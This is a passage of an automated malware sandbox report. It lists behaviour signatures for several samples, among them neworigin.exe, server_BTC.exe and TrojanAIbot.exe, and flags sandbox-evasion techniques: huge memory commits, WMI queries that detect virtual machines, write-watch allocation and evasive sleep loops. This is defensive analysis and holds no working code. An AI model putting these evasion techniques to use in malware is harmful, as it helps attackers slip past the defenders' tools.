Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Allocates many large memory junks
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F20000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F21000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F4D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F4E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2FA4000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 309C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 309E000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E40000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E41000 memory commit 500178944 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E6D000 memory commit 500002816 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E6E000 memory commit 500350976 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2EC4000 memory commit 501014528 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2FBC000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2FBE000 memory commit 500015104 Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2EE0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2EE1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F0D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F0E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F64000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 305C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 305E000 memory commit 500015104
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 1210000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2D40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 4D40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 980000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2360000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 4360000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 1470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 3230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 17D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: AF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 1160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2BA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 4DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 10F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 30B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 32F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 52F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 13E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4F90000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199422
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199202
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 4765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 1708 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7244
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 2893
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 6894
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 6957
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 2689
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 5196
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 4649
Found dropped PE file which has not been started or loaded
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe Dropped PE file which has not been started: C:\Users\Public\xpha.pif Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\Public\Libraries\Wisrysxl.PIF API coverage: 9.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -19369081277395017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -200000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452 Thread sleep count: 4765 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99792s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99227s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99027s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98915s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98788s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98667s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98560s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98454s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98310s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98167s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97929s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97796s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97680s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97466s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97349s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97213s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97089s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96966s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452 Thread sleep count: 1708 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96808s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96390s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96268s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96144s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95893s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95653s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95542s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95430s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95320s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95200s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95087s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94968s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94853s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94743s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94634s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94495s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94377s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94244s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94113s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93977s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93660s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93392s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93166s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99853s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99688s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5880 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 7244 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200 Thread sleep time: -173580000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200 Thread sleep time: -413640000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 2636 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460 Thread sleep count: 6957 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99378s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98847s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98353s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98220s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97956s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97754s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97499s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97358s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96991s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96789s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96199s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95705s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95481s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95325s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94986s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94191s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93915s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99555s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99394s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98628s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98223s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97817s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97245s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97005s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96861s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96702s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460 Thread sleep count: 2689 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96480s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96263s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96151s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95904s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95794s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95685s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95576s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95467s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95357s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95248s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95139s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94495s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94283s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94154s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94044s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93717s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93607s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199640s >= -30000s
